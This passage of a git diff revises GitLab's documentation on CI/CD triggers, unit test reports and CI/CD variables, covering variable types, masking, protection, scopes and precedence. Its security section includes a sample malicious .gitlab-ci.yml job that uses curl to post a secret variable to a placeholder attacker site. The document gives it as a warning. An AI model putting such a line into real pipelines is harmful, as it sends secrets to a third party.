you are accessing a private GitLab repository. -The private key is displayed in the job log, unless you enable +In the following example, the `ssh-add -` command does not display the value of +`$SSH_PRIVATE_KEY` in the job log, though it could be exposed if you enable [debug logging](../variables/README.md#debug-logging). You might also want to check the [visibility of your pipelines](../pipelines/settings.md#visibility-of-pipelines). diff --git a/doc/ci/triggers/README.md b/doc/ci/triggers/README.md index fa97cbdfcec..3cdf45a8cbc 100644 --- a/doc/ci/triggers/README.md +++ b/doc/ci/triggers/README.md @@ -188,38 +188,13 @@ source repository. Be sure to URL-encode `ref` if it contains slashes. ### Using webhook payload in the triggered pipeline > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/31197) in GitLab 13.9. -> - It's [deployed behind a feature flag](../../user/feature_flags.md), enabled by default. -> - It's enabled on GitLab.com. -> - It's recommended for production use. -> - For GitLab self-managed instances, GitLab administrators can opt to [disable it](#enable-or-disable-the-trigger_payload-variable). **(FREE SELF)** - -WARNING: -This feature might not be available to you. Check the **version history** note above for details. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/321027) in GitLab 13.11. If you trigger a pipeline by using a webhook, you can access the webhook payload with the `TRIGGER_PAYLOAD` [predefined CI/CD variable](../variables/predefined_variables.md). -The payload is exposed as a [file-type variable](../variables/README.md#custom-cicd-variables-of-type-file), +The payload is exposed as a [file-type variable](../variables/README.md#cicd-variable-types), so you can access the data with `cat $TRIGGER_PAYLOAD` or a similar command. -#### Enable or disable the `TRIGGER_PAYLOAD` variable - -The `TRIGGER_PAYLOAD` CI/CD variable is under development but ready for production use. -It is deployed behind a feature flag that is **enabled by default**. -[GitLab administrators with access to the GitLab Rails console](../../administration/feature_flags.md) -can opt to disable it. - -To disable it: - -```ruby -Feature.disable(:ci_trigger_payload_into_pipeline) -``` - -To enable it: - -```ruby -Feature.enable(:ci_trigger_payload_into_pipeline) -``` - ## Making use of trigger variables You can pass any number of arbitrary variables in the trigger API call and they @@ -280,7 +255,7 @@ curl --request POST \ "https://gitlab.example.com/api/v4/projects/9/trigger/pipeline" ``` -Trigger variables have the [highest priority](../variables/README.md#priority-of-cicd-variables) +Trigger variables have the [highest priority](../variables/README.md#cicd-variable-precedence) of all types of variables. ## Using cron to trigger nightly pipelines diff --git a/doc/ci/unit_test_reports.md b/doc/ci/unit_test_reports.md index 2aee5e364ad..c4f3073e142 100644 --- a/doc/ci/unit_test_reports.md +++ b/doc/ci/unit_test_reports.md @@ -41,7 +41,7 @@ Consider the following workflow: ## How it works First, GitLab Runner uploads all [JUnit report format XML files](https://www.ibm.com/support/knowledgecenter/en/SSQ2R2_14.1.0/com.ibm.rsar.analysis.codereview.cobol.doc/topics/cac_useresults_junit.html) -as [artifacts](pipelines/job_artifacts.md#artifactsreportsjunit) to GitLab. Then, when you visit a merge request, GitLab starts +as [artifacts](yaml/README.md#artifactsreportsjunit) to GitLab. Then, when you visit a merge request, GitLab starts comparing the head and base branch's JUnit report format XML files, where: - The base branch is the target branch (usually the default branch). @@ -77,7 +77,7 @@ If a test failed in the project's default branch in the last 14 days, a message ## How to set it up To enable the Unit test reports in merge requests, you need to add -[`artifacts:reports:junit`](pipelines/job_artifacts.md#artifactsreportsjunit) +[`artifacts:reports:junit`](yaml/README.md#artifactsreportsjunit) in `.gitlab-ci.yml`, and specify the path(s) of the generated test reports. The reports must be `.xml` files, otherwise [GitLab returns an Error 500](https://gitlab.com/gitlab-org/gitlab/-/issues/216575). @@ -344,7 +344,7 @@ When [this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/6061) is complet If JUnit report format XML files contain an `attachment` tag, GitLab parses the attachment. -Upload your screenshots as [artifacts](pipelines/job_artifacts.md#artifactsreportsjunit) to GitLab. The `attachment` tag **must** contain the absolute path to the screenshots you uploaded. +Upload your screenshots as [artifacts](yaml/README.md#artifactsreportsjunit) to GitLab. The `attachment` tag **must** contain the absolute path to the screenshots you uploaded. ```xml <testcase time="1.00" name="Test"> diff --git a/doc/ci/variables/README.md b/doc/ci/variables/README.md index 5da501d4d8b..20de736a6e6 100644 --- a/doc/ci/variables/README.md +++ b/doc/ci/variables/README.md @@ -7,14 +7,18 @@ type: reference # GitLab CI/CD variables **(FREE)** -CI/CD variables are part of the environment in which [pipelines](../pipelines/index.md) -and jobs run. For example, you could: +CI/CD variables are a type of environment variable. You can use them to: -- Use the value of a `TEMP` variable to know the correct location to store temporary files. -- Use a `DATABASE_URL` variable for the URL to a database that can be reused in different scripts. +- Control the behavior of jobs and [pipelines](../pipelines/index.md). +- Store values you want to re-use. +- Avoid hard-coding values in your `.gitlab-ci.yml` file. -Variables can be used to customize your jobs in [GitLab CI/CD](../README.md). -When you use variables, you don't have to hard-code values. +You can use [predefined CI/CD variables](#predefined-cicd-variables) or define custom: + +- [Variables in the `.gitlab-ci.yml` file](#create-a-custom-cicd-variable-in-the-gitlab-ciyml-file). +- [Project CI/CD variables](#project-cicd-variables). +- [Group CI/CD variables](#group-cicd-variables). +- [Instance CI/CD variables](#instance-cicd-variables). > For more information about advanced use of GitLab CI/CD: > @@ -26,24 +30,14 @@ When you use variables, you don't have to hard-code values. ## Predefined CI/CD variables GitLab CI/CD has a [default set of predefined CI/CD variables](predefined_variables.md) -that you can use without any additional specification. -You can call issue numbers, user names, branch names, -pipeline and commit IDs, and much more. - -Predefined variables are provided by GitLab for the local environment of the runner. - -GitLab reads the `.gitlab-ci.yml` file and sends the information -to the runner, where the variables are exposed. The runner then runs the script commands. +you can use in pipelines configuration and job scripts. ### Use predefined CI/CD variables -You can choose one of the existing predefined CI/CD variables -to be output by the runner. - -This example shows how to output a job's stage by using the predefined variable `CI_JOB_STAGE`. +You can use predefined CI/CD variables in your `.gitlab-ci.yml` without declaring them first. -In your `.gitlab-ci.yml` file, call the variable from your script. Ensure -you use the correct [syntax](#syntax-of-cicd-variables-in-job-scripts). +This example shows how to output a job's stage by using the `CI_JOB_STAGE` +predefined variable: ```yaml test_variable: @@ -52,60 +46,106 @@ test_variable: - echo $CI_JOB_STAGE ``` -In this case, the runner outputs the `stage` for the -job `test_variable`, which is `test`: +The script outputs the `stage` for the `test_variable`, which is `test`:  ## Custom CI/CD variables -When you need a specific custom variable, you can -[set it up in the UI](#create-a-custom-variable-in-the-ui), in [the API](../../api/project_level_variables.md), -or directly [in the `.gitlab-ci.yml` file](#create-a-custom-variable-in-gitlab-ciyml). +You can create custom CI/CD variables: -The variables are used by the runner any time the pipeline runs. -You can also [override variable values manually for a specific pipeline](../jobs/index.md#specifying-variables-when-running-manual-jobs), +- For a project: + - [In the project's `.gitlab-ci.yml` file](#create-a-custom-cicd-variable-in-the-gitlab-ciyml-file). + - [In the project's settings](#project-cicd-variables). + - [With the API](../../api/project_level_variables.md). +- For all projects in a group [in the group's setting](#group-cicd-variables). +- For all projects in a GitLab instance [in the instance's settings](#instance-cicd-variables). + +You can [override variable values manually for a specific pipeline](../jobs/index.md#specifying-variables-when-running-manual-jobs), or have them [prefilled in manual pipelines](../pipelines/index.md#prefill-variables-in-manual-pipelines). -There are two types of variables: **Variable** and **File**. You cannot set types in -the `.gitlab-ci.yml` file, but you can set them in the UI and API. +There are two types of variables: [`File` or `Variable`](#cicd-variable-types). + +Variable names are limited by the [shell the runner uses](https://docs.gitlab.com/runner/shells/index.html) +to execute scripts. Each shell has its own set of reserved variable names. + +Make sure each variable is defined for the [scope you want to use it in](where_variables_can_be_used.md). -### Create a custom variable in `.gitlab-ci.yml` +### Create a custom CI/CD variable in the `.gitlab-ci.yml` file -To create a custom `env_var` variable in the [`.gitlab-ci.yml`](../yaml/README.md#variables) file, -define the variable/value pair under `variables`: +To create a custom variable in the [`.gitlab-ci.yml`](../yaml/README.md#variables) file, +define the variable and value with `variables` keyword. + +You can use the `variables` keyword in a job or at the top level of the `.gitlab-ci.yml` file. +If the variable is at the top level, it's globally available and all jobs can use it. +If it's defined in a job, only that job can use it. ```yaml variables: - TEST: "HELLO WORLD" + TEST_VAR: "All jobs can use this variable's value" + +job1: + variables: + TEST_VAR_JOB: "Only job1 can use this variable's value" + script: + - echo $TEST_VAR and $TEST_VAR_JOB +``` + +Variables saved in the `.gitlab-ci.yml` file should store only non-sensitive project +configuration, like a `RAILS_ENV` or `DATABASE_URL` variable. These variables are +visible in the repository. Store sensitive variables containing secrets, keys, and so on +in project settings. + +Variables saved in the `.gitlab-ci.yml` file are also available in [service containers](../docker/using_docker_images.md). + +If you don't want globally defined variables to be available in a job, set `variables` +to `{}`: + +```yaml +job1: + variables: {} + script: + - echo This job does not need any variables ``` -You can then call its value in your script: +You can use variables to help define other variables. Use `$$` to ignore a variable +name inside another variable: ```yaml +variables: + FLAGS: '-al' + LS_CMD: 'ls $FLAGS $$TMP_DIR' script: - - echo "$TEST" + - 'eval $LS_CMD' # Executes 'ls -al $TMP_DIR' ``` -For more details, see [`.gitlab-ci.yml` defined variables](#gitlab-ciyml-defined-variables). +Use the [`value` and `description`](../yaml/README.md#prefill-variables-in-manual-pipelines) +keywords to define [variables that are prefilled](../pipelines/index.md#prefill-variables-in-manual-pipelines) +for [manually-triggered pipelines](../pipelines/index.md#run-a-pipeline-manually). + +### Project CI/CD variables -### Create a custom variable in the UI +You can add CI/CD variables to a project's settings. Only project members with +[maintainer permissions](../../user/permissions.md#project-members-permissions) +can add or update project CI/CD variables. To keep a CI/CD variable secret, put it +in the project settings, not in the `.gitlab-ci.yml` file. -From the UI, you can add or update custom variables: +To add or update variables in the project settings: 1. Go to your project's **Settings > CI/CD** and expand the **Variables** section. -1. Click the **Add Variable** button. In the **Add variable** modal, fill in the details: - - - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`. - - **Value**: No limitations. - - **Type**: `File` or `Variable`. - - **Environment scope**: `All`, or specific [environments](../environments/index.md). - - **Protect variable** (Optional): If selected, the variable is only available in pipelines that run on protected branches or tags. - - **Mask variable** (Optional): If selected, the variable's **Value** is masked in job logs. The variable fails to save if the value does not meet the [masking requirements](#masked-variable-requirements). +1. Select the **Add Variable** button and fill in the details: -After a variable is created, you can update any of the details by clicking the **{pencil}** **Edit** button. + - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`. + - **Value**: No limitations. + - **Type**: [`File` or `Variable`](#cicd-variable-types). + - **Environment scope**: `All`, or specific [environments](../environments/index.md). + - **Protect variable** (Optional): If selected, the variable is only available + in pipelines that run on protected branches or tags. + - **Mask variable** (Optional): If selected, the variable's **Value** is masked + in job logs. The variable fails to save if the value does not meet the + [masking requirements](#mask-a-cicd-variable). -After you set a variable, call it from the `.gitlab-ci.yml` file: +After you create a variable, you can use it in the `.gitlab-ci.yml` file: ```yaml test_variable: @@ -121,114 +161,181 @@ The output is:  -Variables can only be updated or viewed by project members with [maintainer permissions](../../user/permissions.md#project-members-permissions). +### Group CI/CD variables -#### Security +> - Introduced in GitLab 9.4. +> - Support for [environment scopes](https://gitlab.com/gitlab-org/gitlab/-/issues/2874) added to GitLab Premium in 13.11 -Malicious code pushed to your `.gitlab-ci.yml` file could compromise your variables and send them to a third party server regardless of the masked setting. If the pipeline runs on a [protected branch](../../user/project/protected_branches.md) or [protected tag](../../user/project/protected_tags.md), it could also compromise protected variables. +To make a CI/CD variable available to all projects in a group, define a group CI/CD variable. -All merge requests that introduce changes to `.gitlab-ci.yml` should be reviewed carefully before: +Use group variables to store secrets like passwords, SSH keys, and credentials, if you: -- [Running a pipeline in the parent project for a merge request submitted from a forked project](../merge_request_pipelines/index.md#run-pipelines-in-the-parent-project-for-merge-requests-from-a-forked-project). -- Merging the changes. +- Do **not** use an external key store. +- Use the GitLab [integration with HashiCorp Vault](../secrets/index.md). -Here is a simplified example of a malicious `.gitlab-ci.yml`: +To add a group variable: -```yaml -build: - script: - - curl --request POST --data "secret_variable=$SECRET_VARIABLE" "https://maliciouswebsite.abcd/" -``` +1. In the group, go to **Settings > CI/CD**. +1. Select the **Add Variable** button and fill in the details: -### Custom CI/CD variables of type Variable + - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`. + - **Value**: No limitations. + - **Type**: [`File` or `Variable`](#cicd-variable-types). + - **Environment scope** (optional): `All`, or specific [environments](#limit-the-environment-scope-of-a-cicd-variable). + - **Protect variable** (Optional): If selected, the variable is only available + in pipelines that run on protected branches or tags. + - **Mask variable** (Optional): If selected, the variable's **Value** is masked + in job logs. The variable fails to save if the value does not meet the + [masking requirements](#mask-a-cicd-variable). -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/46806) in GitLab 11.11. +To view the group-level variables available in a project: + +1. In the project, go to **Settings > CI/CD**. +1. Expand the **Variables** section. + +Variables from [subgroups](../../user/group/subgroups/index.md) are recursively +inherited. + + -For variables with the type **Variable**, the runner creates an environment variable -that uses the key for the name and the value for the value. +### Instance CI/CD variables -There are [some predefined variables](#custom-variables-validated-by-gitlab) of this type, -which may be further validated. They appear when you add or update a variable in the UI. +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/14108) in GitLab 13.0. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/299879) in GitLab 13.11. -### Custom CI/CD variables of type File +To make a CI/CD variable available to all projects and groups in a GitLab instance, +define an instance CI/CD variable. + +You can define instance variables via the UI or [API](../../api/instance_level_ci_variables.md). + +To add an instance variable: + +1. Navigate to your Admin Area's **Settings > CI/CD** and expand the **Variables** section. +1. Select the **Add variable** button, and fill in the details: + + - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`. + - **Value**: [In GitLab 13.3 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/220028), + 10,000 characters is allowed. This is also bounded by the limits of the selected + runner operating system. In GitLab 13.0 to 13.2, 700 characters is allowed. + - **Type**: [`File` or `Variable`](#cicd-variable-types). + - **Protect variable** (Optional): If selected, the variable is only available + in pipelines that run on protected branches or tags. + - **Mask variable** (Optional): If selected, the variable's **Value** is not shown + in job logs. The variable is not saved if the value does not meet the [masking requirements](#mask-a-cicd-variable). + +### CI/CD variable types > [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/46806) in GitLab 11.11. -For variables with the type **File**, the runner creates an environment variable that uses the key for the name. -For the value, the runner writes the variable value to a temporary file and uses this path. +All predefined CI/CD variables and variables defined in the `.gitlab-ci.yml` file +are `Variable` type. Project, group and instance CI/CD variables can be `Variable` +or `File` type. -You can use tools like [the AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html) +`Variable` type variables: + +- Consist of a key and value pair. +- Are made available in jobs as environment variables, with: + - The CI/CD variable key as the environment variable name. + - The CI/CD variable value as the environment variable value. + +Use `File` type CI/CD variables for tools that need a file as input. + +`File` type variables: + +- Consist of a key, value and file. +- Are made available in jobs as environment variables, with + - The CI/CD variable key as the environment variable name. + - The CI/CD variable value saved to a temporary file. + - The path to the temporary file as the environment variable value. + +Some tools like [the AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html) and [`kubectl`](https://kubernetes.io/docs/concepts/configuration/organize-cluster-access-kubeconfig/#the-kubeconfig-environment-variable) -to customize your configuration by using **File** type variables. +use `File` type variables for configuration. + +For example, if you have the following variables: -Previously, a common pattern was to read the value of a CI/CD variable, save it in a file, and then -use that file in your script: +- A variable of type `Variable`: `KUBE_URL` with the value `https://example.com`. +- A variable of type `File`: `KUBE_CA_PEM` with a certificate as the value. + +Use the variables in a job script like this: ```shell -# Read certificate stored in $KUBE_CA_PEM variable and save it in a new file -echo "$KUBE_CA_PEM" > "$(pwd)/kube.ca.pem" -# Pass the newly created file to kubectl -kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$(pwd)/kube.ca.pem" +kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$KUBE_CA_PEM" ``` -Instead of this, you can use a **File** type variable. For example, if you have the following variables: - -- A variable of type **Variable**: `KUBE_URL` with the value `https://example.com`. -- A variable of type **File**: `KUBE_CA_PEM` with a certificate as the value. +An alternative to `File` type variables is to: -You can call them from `.gitlab-ci.yml`, like this: +- Read the value of a CI/CD variable (`variable` type). +- Save the value in a file. +- Use that file in your script. ```shell -kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$KUBE_CA_PEM" +# Read certificate stored in $KUBE_CA_PEM variable and save it in a new file +echo "$KUBE_CA_PEM" > "$(pwd)/kube.ca.pem" +# Pass the newly created file to kubectl +kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$(pwd)/kube.ca.pem" ``` -### Mask a custom variable +### Mask a CI/CD variable > [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/13784) in GitLab 11.10 -Variables can be masked so that the value of the variable is hidden in job logs. +You can mask a project, group, or instance CI/CD variable so the value of the variable +does not display in job logs. To mask a variable: -1. Go to **Settings > CI/CD**. +1. Go to **Settings > CI/CD** in the project, group or instance admin area. 1. Expand the **Variables** section. -1. Next to the variable you want to protect, click **Edit**. +1. Next to the variable you want to protect, select **Edit**. 1. Select the **Mask variable** check box. -1. Click **Update variable**. - -#### Masked variable requirements +1. Select **Update variable**. The value of the variable must: -- Be in a single line. -- Be at least 8 characters long. -- Not be a predefined or custom CI/CD variable. -- Consist only of: +- Be a single line. +- Be 8 characters or longer, consisting only of: - Characters from the Base64 alphabet (RFC4648). - The `@` and `:` characters ([In GitLab 12.2](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/63043) and later). - The `.` character ([In GitLab 12.10](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/29022) and later). +- Not match the name of an existing predefined or custom CI/CD variable. -You can't mask variables that don't meet these requirements. +### Protect a CI/CD variable -### Protect a custom variable - -> Introduced in GitLab 9.3. - -Variables can be protected. When a variable is -protected, it is only passed to pipelines running on -[protected branches](../../user/project/protected_branches.md) or [protected tags](../../user/project/protected_tags.md). The other pipelines do not get -the protected variable. +You can protect a project, group or instance CI/CD variable so it is only passed +to pipelines running on [protected branches](../../user/project/protected_branches.md) +or [protected tags](../../user/project/protected_tags.md). To protect a variable: -1. Go to **Settings > CI/CD**. +1. Go to **Settings > CI/CD** in the project, group or instance admin area. 1. Expand the **Variables** section. -1. Next to the variable you want to protect, click **Edit**. +1. Next to the variable you want to protect, select **Edit**. 1. Select the **Protect variable** check box. -1. Click **Update variable**. +1. Select **Update variable**. The variable is available for all subsequent pipelines. +### CI/CD variable security + +Malicious code pushed to your `.gitlab-ci.yml` file could compromise your variables +and send them to a third party server regardless of the masked setting. If the pipeline +runs on a [protected branch](../../user/project/protected_branches.md) or +[protected tag](../../user/project/protected_tags.md), malicious code can compromise protected variables. + +Review all merge requests that introduce changes to the `.gitlab-ci.yml` file before you: + +- [Run a pipeline in the parent project for a merge request submitted from a forked project](../merge_request_pipelines/index.md#run-pipelines-in-the-parent-project-for-merge-requests-from-a-forked-project). +- Merge the changes. + +The following example shows malicious code in a `.gitlab-ci.yml` file: + +```yaml +build: + script: + - curl --request POST --data "secret_variable=$SECRET_VARIABLE" "https://maliciouswebsite.abcd/" +``` + ### Custom variables validated by GitLab Some variables are listed in the UI so you can choose them more quickly. @@ -240,26 +347,21 @@ Some variables are listed in the UI so you can choose them more quickly. | `AWS_SECRET_ACCESS_KEY` | Any | 12.10 | WARNING: -When you store credentials, there are security implications. If you are using AWS keys, -for example, follow their [best practices](https://docs.aws.amazon.com/general/latest/gr/aws-access-keys-best-practices.html). - -## Syntax of CI/CD variables in job scripts +When you store credentials, there are [security implications](#cicd-variable-security). +If you use AWS keys for example, follow the [Best practices for managing AWS access keys](https://docs.aws.amazon.com/general/latest/gr/aws-access-keys-best-practices.html). -All variables are set as environment variables in the build environment, and -they are accessible with normal methods that are used to access such variables. -In most cases `bash` or `sh` is used to execute the job script. +## Use CI/CD variables in job scripts -To access environment variables, use the syntax for your runner's [shell](https://docs.gitlab.com/runner/executors/). +All CI/CD variables are set as environment variables in the job's environment. +You can use variables in job scripts with the standard formatting for each environment's +shell. -| Shell | Usage | -|----------------------|------------------------------------------| -| bash/sh | `$variable` | -| PowerShell | `$env:variable` (primary) or `$variable` | -| Windows Batch | `%variable%`, or `!variable!` for [delayed expansion](https://ss64.com/nt/delayedexpansion.html), which can be used for variables that contain white spaces or newlines. | +To access environment variables, use the syntax for your [runner executor's shell](https://docs.gitlab.com/runner/executors/). -### Bash +### Use variables with Bash, `sh` and similar -To access environment variables in **bash**, prefix the CI/CD variable name with (`$`): +To access environment variables in Bash, `sh`, and similar shells, prefix the +CI/CD variable with (`$`): ```yaml job_name: @@ -267,13 +369,10 @@ job_name: - echo $CI_JOB_ID ``` -### PowerShell +### Use variables with PowerShell -To access variables in a **Windows PowerShell** environment, including system set -environment variables, prefix the variable name with (`$env:`). GitLab CI/CD variables -can also be accessed by prefixing the variable name with (`$`) with -[GitLab Runner 1.0.0](https://gitlab.com/gitlab-org/gitlab-runner/-/merge_requests/68) -and later. +To access variables in a Windows PowerShell environment, including environment +variables set by the system, prefix the variable name with (`$env:`) or (`$`): ```yaml job_name: @@ -284,7 +383,7 @@ job_name: ``` In [some cases](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4115#note_157692820) -environment variables may need to be surrounded by quotes to expand properly: +environment variables might need to be surrounded by quotes to expand properly: ```yaml job_name: @@ -294,8 +393,8 @@ job_name: ### Windows Batch -To access environment variables in **Windows Batch**, surround the variable -with (`%`): +To access environment variables in Windows Batch, surround the variable +with `%`: ```yaml job_name: @@ -303,34 +402,45 @@ job_name: - echo %CI_JOB_ID% ``` +You can also surround the variable with `!` for [delayed expansion](https://ss64.com/nt/delayedexpansion.html). +Delayed expansion might be needed for variables that contain white spaces or newlines. + +```yaml +job_name: + script: + - echo !ERROR_MESSAGE! +``` + ### List all environment variables -You can also list all environment variables with the `export` command in Bash -or `dir env:` command in PowerShell. -Be aware that this also exposes the values of all the variables -you set, in the job log: +You can list all environment variables available to a script with the `export` command +in Bash or `dir env:` in PowerShell. This exposes the values of **all** available +variables, which can be a [security risk](#cicd-variable-security). +[Masked variables](#mask-a-cicd-variable) display as `[masked]`. + +For example: ```yaml job_name: script: - export - # - 'dir env:' # use this for PowerShell + # - 'dir env:' # Use this for PowerShell ``` -Example values: +Example job log output: ```shell export CI_JOB_ID="50" export CI_COMMIT_SHA="1ecfd275763eff1d6b4844ea3168962458c9f27a" export CI_COMMIT_SHORT_SHA="1ecfd275" export CI_COMMIT_REF_NAME="master" -export CI_REPOSITORY_URL="https://gitlab-ci-token:abcde-1234ABCD5678ef@example.com/gitlab-org/gitlab-foss.git" +export CI_REPOSITORY_URL="https://gitlab-ci-token:[masked]@example.com/gitlab-org/gitlab-foss.git" export CI_COMMIT_TAG="1.0.0" export CI_JOB_NAME="spec:other" export CI_JOB_STAGE="test" export CI_JOB_MANUAL="true" export CI_JOB_TRIGGERED="true" -export CI_JOB_TOKEN="abcde-1234ABCD5678ef" +export CI_JOB_TOKEN="[masked]" export CI_PIPELINE_ID="1000" export CI_PIPELINE_IID="10" export CI_PAGES_DOMAIN="gitlab.io" @@ -346,7 +456,7 @@ export CI_PROJECT_URL="https://example.com/gitlab-org/gitlab-foss" export CI_REGISTRY="registry.example.com" export CI_REGISTRY_IMAGE="registry.example.com/gitlab-org/gitlab-foss" export CI_REGISTRY_USER="gitlab-ci-token" -export CI_REGISTRY_PASSWORD="longalfanumstring" +export CI_REGISTRY_PASSWORD="[masked]" export CI_RUNNER_ID="10" export CI_RUNNER_DESCRIPTION="my runner" export CI_RUNNER_TAGS="docker, linux" @@ -363,126 +473,26 @@ export CI_SERVER_VERSION_MINOR="9" export CI_SERVER_VERSION_PATCH="0" export GITLAB_USER_EMAIL="user@example.com" export GITLAB_USER_ID="42" +... ``` -## `.gitlab-ci.yml` defined variables - -You can add CI/CD variables to `.gitlab-ci.yml`. These variables are saved in the repository, -and they are meant to store non-sensitive project configuration, like `RAILS_ENV` or -`DATABASE_URL`. - -For example, if you set the variable below globally (not inside a job), it is -used in all executed commands and scripts: - -```yaml -variables: - DATABASE_URL: "postgres://postgres@postgres/my_database" -``` - -The YAML-defined variables are also set to all created -[service containers](../docker/using_docker_images.md), so that you can fine -tune them. - -Variables can be defined at a global level, but also at a job level. To turn off -global defined variables in your job, define an empty hash: - -```yaml -job_name: - variables: {} -``` - -You are able to use other variables inside your variable definition (or escape them with `$$`): - -```yaml -variables: - LS_CMD: 'ls $FLAGS $$TMP_DIR' - FLAGS: '-al' -script: - - 'eval $LS_CMD' # will execute 'ls -al $TMP_DIR' -``` - -Use the [`value` and `description`](../yaml/README.md#prefill-variables-in-manual-pipelines) -keywords to define [variables that are prefilled](../pipelines/index.md#prefill-variables-in-manual-pipelines) -when [running a pipeline manually](../pipelines/index.md#run-a-pipeline-manually): - -## Group-level CI/CD variables - -> Introduced in GitLab 9.4. - -You can define per-project or per-group variables that are set in the pipeline environment. -Group-level variables are stored out of the repository (not in `.gitlab-ci.yml`). -They are securely passed to GitLab Runner, which makes them available during a pipeline run. - -We recommend using group variables to store secrets (like passwords, SSH keys, and -credentials) for users who: - -- Do **not** use an external key store. -- Use the GitLab [integration with HashiCorp Vault](../secrets/index.md). - -Group-level variables can be added by: - -1. Navigating to your group's **Settings > CI/CD** page. -1. Inputting variable types, keys, and values in the **Variables** section. - Any variables of [subgroups](../../user/group/subgroups/index.md) are inherited recursively. - -After you set them, they are available for all subsequent pipelines. Any group-level user defined variables can be viewed in projects by: - -1. Navigating to the project's **Settings > CI/CD** page. -1. Expanding the **Variables** section. - - - -## Instance-level CI/CD variables - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/14108) in GitLab 13.0. - -Instance variables are useful for no longer needing to manually enter the same credentials repeatedly for all your projects. Instance-level variables are available to all projects and groups on the instance. - -In GitLab 13.1 and later, the [maximum number of instance-level variables is 25](https://gitlab.com/gitlab-org/gitlab/-/issues/216097). - -You can define instance-level variables via the UI or [API](../../api/instance_level_ci_variables.md). - -To add an instance-level variable: - -1. Navigate to your Admin Area's **Settings > CI/CD** and expand the **Variables** section. -1. Click the **Add variable** button, and fill in the details: - - - **Key**: Must be one line, using only letters, numbers, or `_` (underscore), with no spaces. - - **Value**: [In GitLab 13.3 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/220028), 10,000 characters allowed. This is also bounded by the limits of the selected runner operating system. In GitLab 13.0 to 13.2, 700 characters allowed. - - **Type**: `File` or `Variable`. - - **Protect variable** (Optional): If selected, the variable is only available in pipelines that run on protected branches or tags. - - **Mask variable** (Optional): If selected, the variable's **Value** is not shown in job logs. The variable is not saved if the value does not meet the [masking requirements](#masked-variable-requirements). - -After a variable is created, you can update any of the details by clicking the **{pencil}** **Edit** button. - -### Enable or disable UI interface for instance-level CI/CD variables - -The UI interface for Instance-level CI/CD variables is under development but ready for production use. -It is deployed behind a feature flag that is **enabled by default**. -[GitLab administrators with access to the GitLab Rails console](../../administration/feature_flags.md) can opt to disable it for your instance. - -To disable it: - -```ruby -Feature.disable(:instance_variables_ui) -``` - -To enable it: - -```ruby -Feature.enable(:instance_variables_ui) -``` - -## Inherit CI/CD variables +## Pass an environment variable to another job -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/22638) in GitLab 13.0 behind a disabled [feature flag](../../administration/feature_flags.md): `ci_dependency_variables`. +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/22638) in GitLab 13.0. > - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/217834) in GitLab 13.1. -You can inherit CI/CD variables from dependent jobs. +You can pass environment variables from one job to another job in a later stage. +These variables cannot be used as CI/CD variables to configure a pipeline, but +they can be used in job scripts. -This feature makes use of the [`artifacts:reports:dotenv`](../pipelines/job_artifacts.md#artifactsreportsdotenv) report feature. +1. In the job script, save the variable as a `.env` file. +1. Save the `.env` file as an [`artifacts:reports:dotenv`](../yaml/README.md#artifactsreportsdotenv) +artifact. +1. Set a job in a later stage to receive the artifact by using the [`dependencies`](../yaml/README.md#dependencies) + or the [`needs`](../yaml/README.md#artifact-downloads-with-needs) keywords. +1. The later job can then [use the variable in scripts](#use-cicd-variables-in-job-scripts). -Example with [`dependencies`](../yaml/README.md#dependencies) keyword. +For example, with the [`dependencies`](../yaml/README.md#dependencies) keyword: ```yaml build: @@ -496,12 +506,12 @@ build: deploy: stage: deploy script: - - echo $BUILD_VERSION # => hello + - echo $BUILD_VERSION # Output is: 'hello' dependencies: - build ``` -Example with the [`needs`](../yaml/README.md#artifact-downloads-with-needs) keyword: +For example, with the [`needs`](../yaml/README.md#artifact-downloads-with-needs) keyword: ```yaml build: @@ -515,133 +525,113 @@ build: deploy: stage: deploy script: - - echo $BUILD_VERSION # => hello + - echo $BUILD_VERSION # Output is: 'hello' needs: - job: build artifacts: true ``` -## Priority of CI/CD variables +## CI/CD variable precedence -Variables of different types can take precedence over other -variables, depending on where they are defined. +You can use CI/CD variables with the same name in different places, but the values +can overwrite each other. The type of variable and where they are defined determines +which variables take precedence. The order of precedence for variables is (from highest to lowest): -1. [Trigger variables](../triggers/README.md#making-use-of-trigger-variables), [scheduled pipeline variables](../pipelines/schedules.md#using-variables), - and [manual pipeline run variables](#override-a-variable-by-manually-running-a-pipeline). -1. Project-level [variables](#custom-cicd-variables) or [protected variables](#protect-a-custom-variable). -1. Group-level [variables](#group-level-cicd-variables) or [protected variables](#protect-a-custom-variable). -1. Instance-level [variables](#instance-level-cicd-variables) or [protected variables](#protect-a-custom-variable). -1. [Inherited CI/CD variables](#inherit-cicd-variables). -1. YAML-defined [job-level variables](../yaml/README.md#variables). -1. YAML-defined [global variables](../yaml/README.md#variables). +1. [Trigger variables](../triggers/README.md#making-use-of-trigger-variables), + [scheduled pipeline variables](../pipelines/schedules.md#using-variables), + and [manual pipeline run variables](#override-a-variable-when-running-a-pipeline-manually). +1. Project 